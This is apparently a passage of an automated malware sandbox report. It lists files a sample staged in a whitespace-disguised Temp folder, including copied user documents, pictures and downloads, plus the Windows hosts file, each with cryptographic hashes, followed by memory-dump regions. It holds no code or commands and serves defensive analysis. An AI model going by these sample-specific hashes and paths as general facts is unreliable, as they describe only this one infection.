              55480dcab07b5a804b60f17b9973aababc1c3d935bd8007fd0e5ee2d0622b5b7d9bc5474f66cdd5e5d425c644b6ae770068fc8f2baa7c984bb1d2ca96dc802e0

            • C:\Users\Admin\AppData\Local\Temp\     ‌    \Common Files\Documents\ResizeBackup.xltx

              Filesize

              927KB

              MD5

              11f78fb338fafe75302a09ae7ae30bbc

              SHA1

              5a6c22523f2d37cc09334c9209e871336ca0aa6f

              SHA256

              c6022c76f66588e2ffeb29a4453e055d645856abe70ebfbb061feefa9316a9a4

              SHA512

              a1fe5d2c61329d31d5f77bb248fcedd2ce77aa8642e01b1d9ce9d5fa2e1e4fc8b1f06487a2c170a5c0e295985645db1e2fed15e5341d2ad9cfebd4761b78f23a

            • C:\Users\Admin\AppData\Local\Temp\     ‌    \Common Files\Documents\RestoreCheckpoint.xls

              Filesize

              1.7MB

              MD5

              ab2bee6b0ba143af94c0ac1493663727

              SHA1

              a0561b0e1a60c7cea5b633f1e8a4f20f8822cdbf

              SHA256

              1a28a41baee2785bd3e7b478064333fee8684b85b2dd00275eb12cc6782e9a72

              SHA512

              74f1279e0e215b3c81e4ed24eaa34eb95681bdf563d860960159e5ebfc0a7d49e36dd3e5fd2a76f1d2385fd2ea5e61accf65c3f3c15f2420e92768dd8ce80c58

            • C:\Users\Admin\AppData\Local\Temp\     ‌    \Common Files\Documents\SkipPush.docx

              Filesize

              13KB

              MD5

              7c7eab0ed2bc8863966292191f87b73a

              SHA1

              15a6a42b2649c430c85512d0b173d1e5a28ccb6d

              SHA256

              d662830bb885b44c8d72bb4b2343df108bfb0715578332fc39eecf19605d3db2

              SHA512

              8b6105ce7c5608744ac93916f59ab40cdd58f4d1cf3ccb33b6f0a7d00c64e62f7129c4154b0209a1fa1308a73afea4ddeb166ce33e16cf087470dc3b12b0b8d8

            • C:\Users\Admin\AppData\Local\Temp\     ‌    \Common Files\Downloads\BackupSave.svgz

              Filesize

              1.0MB

              MD5

              aa4bc077267367d247c718c433eb0e06

              SHA1

              133a48011305e62a437ef174ccf9cad5e5b9d716

              SHA256

              47e9cc67f4ebc3532a55d1d34afb95b6330706a32351190ebcfcf94128ad3495

              SHA512

              2ed617f30c37d34e8e97bbe11853622d5d15529ee6206755027b82dfd36939ee0d0fa29ce3c48e0b96d46663f4fff414a3cd327984e4598a909eb6fd53b1c03e

            • C:\Users\Admin\AppData\Local\Temp\     ‌    \Common Files\Downloads\CompareUse.xls

              Filesize

              634KB

              MD5

              a555c41e691876931ef420be7283bf80

              SHA1

              d902e23615be47fe08511c1e9174d220e0251f83

              SHA256

              cfa455d8edeccafa9b3c9e543dc72414bf1f068f2ba46f86a862975befcac515

              SHA512

              5e8365d2c0f9f1da6a3897d8fc7af9e76d267b9269a8d5164caabe94b13b8eb65d8bd896c825b1c8f9c81b80831a88bf9f6f22927a2ee19929952de7882697dd

            • C:\Users\Admin\AppData\Local\Temp\     ‌    \Common Files\Downloads\ReceiveSwitch.doc

              Filesize

              693KB

              MD5

              d884ad600ea6620591a8911a50c6e6c5

              SHA1

              f923175b73147d992b2974ce6186a92334cfddb4

              SHA256

              f1e12e4c13e5fa66ea516e458497b2da30e423d6cff34ce1246ab6f7a43362be

              SHA512

              39dfcd2322bb4af36a8d7444bd99600ff4ebb2bc06615c7b78d289c634d5b30c8199ff81dfe5720d8bbcb19cfd64e3116b34eb2776ea4acbb174017c15bbc44c

            • C:\Users\Admin\AppData\Local\Temp\     ‌    \Common Files\Downloads\TestComplete.txt

              Filesize

              790KB

              MD5

              c1633df53c2fdb39b8fd1cb2d56d2983

              SHA1

              bc5a9c2e43c23506565a70ab67b1f0d9c9094b98

              SHA256

              dc88985e6f2a44447fa7231eaccecd675e0704e7fe66046ee02071758785195d

              SHA512

              919b2b9419647c087f2c807ac4c1b453c9c7862d1c89bb1d0b1188ab32cee698b01a0147a62a9b1ae0e2be972d6e573d7fddaff9fedff3277898a6fb494200f2

            • C:\Users\Admin\AppData\Local\Temp\     ‌    \Common Files\Music\MeasureDebug.docx

              Filesize

              1.1MB

              MD5

              a5e9620e4aabcf243c296a8619895699

              SHA1

              e1ce9062065afdf3302f10b6295ec2df48b25330

              SHA256

              a1ecc82128ad74e516b70da96549daa4d327bb75d337d2f7732935234e93d0d6

              SHA512

              8264f5448fe8e3e000913a2dab15672a4c0908e5bad5f87798480046b42cf23811641cccd57ed9cfdb33d98004d6045f0202a666f64de24689d5241cc7b9884e

            • C:\Users\Admin\AppData\Local\Temp\     ‌    \Common Files\Pictures\ImportSuspend.jpeg

              Filesize

              751KB

              MD5

              4c9075f2047bf0aa7c81d8e0090329f3

              SHA1

              b76aad65c5bf0f14a8352fb9a20b6846b6f8596d

              SHA256

              a6dba22a02029a0cd0b4d1021664cc20735bb833bc77dafbcb2f644c5cebe9c2

              SHA512

              628555710231de1d4f59293ea1a591df2f6d09129a6676a97865e39708345788a688c18ac58fa82b3b064c7fb137551c6abe904c92a93f04bc73b68424344caa

            • C:\Users\Admin\AppData\Local\Temp\     ‌    \Common Files\Pictures\My Wallpaper.jpg

              Filesize

              24KB

              MD5

              a51464e41d75b2aa2b00ca31ea2ce7eb

              SHA1

              5b94362ac6a23c5aba706e8bfd11a5d8bab6097d

              SHA256

              16d5506b6663085b1acd80644ffa5363c158e390da67ed31298b85ddf0ad353f

              SHA512

              b2a09d52c211e7100e3e68d88c13394c64f23bf2ec3ca25b109ffb1e1a96a054f0e0d25d2f2a0c2145616eabc88c51d63023cef5faa7b49129d020f67ab0b1ff

            • C:\Windows\System32\drivers\etc\hosts

              Filesize

              2KB

              MD5

              f99e42cdd8b2f9f1a3c062fe9cf6e131

              SHA1

              e32bdcab8da0e3cdafb6e3876763cee002ab7307

              SHA256

              a040d43136f2f4c41a4875f895060fb910267f2ffad2e3b1991b15c92f53e0f0

              SHA512

              c55a5e440326c59099615b21d0948cdc2a42bd9cf5990ec88f69187fa540d8c2e91aebe6a25ed8359a47be29d42357fec4bd987ca7fae0f1a6b6db18e1c320a6

            • memory/408-71-0x00007FFA63D10000-0x00007FFA63D34000-memory.dmp

              Filesize

              144KB

            • memory/408-30-0x00007FFA63D10000-0x00007FFA63D34000-memory.dmp

              Filesize

              144KB

            • memory/408-25-0x00007FFA62DD0000-0x00007FFA633B8000-memory.dmp

              Filesize

              5.9MB

            • memory/408-32-0x00007FFA6D950000-0x00007FFA6D95F000-memory.dmp

              Filesize

              60KB

            • memory/408-156-0x00007FFA637F0000-0x00007FFA63813000-memory.dmp

              Filesize

              140KB

            • memory/408-276-0x00007FFA63D10000-0x00007FFA63D34000-memory.dmp

              Filesize

              144KB

            • memory/408-84-0x00007FFA54200000-0x00007FFA5431C000-memory.dmp

              Filesize

              1.1MB

            • memory/408-83-0x00007FFA6ACD0000-0x00007FFA6ACE9000-memory.dmp

              Filesize

              100KB

            • memory/408-78-0x00007FFA63820000-0x00007FFA6384D000-memory.dmp

              Filesize

              180KB

            • memory/408-79-0x00007FFA68320000-0x00007FFA6832D000-memory.dmp

              Filesize

              52KB

            • memory/408-76-0x00007FFA5DD70000-0x00007FFA5DD84000-memory.dmp

              Filesize

              80KB

            • memory/408-70-0x00007FFA62DD0000-0x00007FFA633B8000-memory.dmp

              Filesize

              5.9MB

            • memory/408-73-0x00007FFA54320000-0x00007FFA54695000-memory.dmp

              Filesize

              3.5MB

            • memory/408-74-0x000001A4D5BC0000-0x000001A4D5F35000-memory.dmp

              Filesize

              3.5MB

            • memory/408-72-0x00007FFA546A0000-0x00007FFA54758000-memory.dmp

              Filesize

              736KB

            • memory/408-66-0x00007FFA637A0000-0x00007FFA637CE000-memory.dmp

              Filesize

              184KB

            • memory/408-64-0x00007FFA68390000-0x00007FFA6839D000-memory.dmp

              Filesize

              52KB

            • memory/408-62-0x00007FFA637D0000-0x00007FFA637E9000-memory.dmp

              Filesize

              100KB

            • memory/408-60-0x00007FFA54EA0000-0x00007FFA55013000-memory.dmp

              Filesize

              1.4MB

            • memory/408-215-0x00007FFA637D0000-0x00007FFA637E9000-memory.dmp

              Filesize

              100KB

            • memory/408-58-0x00007FFA637F0000-0x00007FFA63813000-memory.dmp

              Filesize

              140KB

            • memory/408-56-0x00007FFA6ACD0000-0x00007FFA6ACE9000-memory.dmp

              Filesize

              100KB

            • memory/408-54-0x00007FFA63820000-0x00007FFA6384D000-memory.dmp

              Filesize

              180KB

            • memory/408-196-0x00007FFA54EA0000-0x00007FFA55013000-memory.dmp

              Filesize

              1.4MB

            • memory/408-241-0x00007FFA637A0000-0x00007FFA637CE000-memory.dmp

              Filesize

              184KB

            • memory/408-244-0x000001A4D5BC0000-0x000001A4D5F35000-memory.dmp

              Filesize

              3.5MB

            • memory/408-242-0x00007FFA546A0000-0x00007FFA54758000-memory.dmp

              Filesize

              736KB

            • memory/408-243-0x00007FFA54320000-0x00007FFA54695000-memory.dmp

              Filesize

              3.5MB

            • memory/408-259-0x00007FFA54200000-0x00007FFA5431C000-memory.dmp

              Filesize

              1.1MB

            • memory/408-251-0x00007FFA54EA0000-0x00007FFA55013000-memory.dmp

              Filesize

              1.4MB

            • memory/408-245-0x00007FFA62DD0000-0x00007FFA633B8000-memory.dmp

              Filesize

              5.9MB

            • memory/408-246-0x00007FFA63D10000-0x00007FFA63D34000-memory.dmp

              Filesize

              144KB

            • memory/408-260-0x00007FFA62DD0000-0x00007FFA633B8000-memory.dmp

              Filesize

              5.9MB

            • memory/408-275-0x00007FFA6D950000-0x00007FFA6D95F000-memory.dmp

              Filesize

              60KB

            • memory/408-285-0x00007FFA54320000-0x00007FFA54695000-memory.dmp

              Filesize

              3.5MB

            • memory/408-289-0x00007FFA54200000-0x00007FFA5431C000-memory.dmp

              Filesize

              1.1MB

            • memory/408-288-0x00007FFA68320000-0x00007FFA6832D000-memory.dmp

              Filesize

              52KB

            • memory/408-287-0x00007FFA5DD70000-0x00007FFA5DD84000-memory.dmp

              Filesize

              80KB

            • memory/408-286-0x000001A4D5BC0000-0x000001A4D5F35000-memory.dmp

              Filesize

              3.5MB

            • memory/408-284-0x00007FFA546A0000-0x00007FFA54758000-memory.dmp

              Filesize

              736KB

            • memory/408-283-0x00007FFA637A0000-0x00007FFA637CE000-memory.dmp

              Filesize

              184KB

            • memory/408-282-0x00007FFA68390000-0x00007FFA6839D000-memory.dmp

              Filesize

              52KB

            • memory/408-281-0x00007FFA637D0000-0x00007FFA637E9000-memory.dmp

              Filesize

              100KB

            • memory/408-280-0x00007FFA54EA0000-0x00007FFA55013000-memory.dmp

              Filesize

              1.4MB

            • memory/408-279-0x00007FFA637F0000-0x00007FFA63813000-memory.dmp

              Filesize

              140KB

            • memory/408-278-0x00007FFA6ACD0000-0x00007FFA6ACE9000-memory.dmp

              Filesize

              100KB

            • memory/408-277-0x00007FFA63820000-0x00007FFA6384D000-memory.dmp

              Filesize

              180KB

            • memory/1628-127-0x00000173EC060000-0x00000173EC082000-memory.dmp

              Filesize

              136KB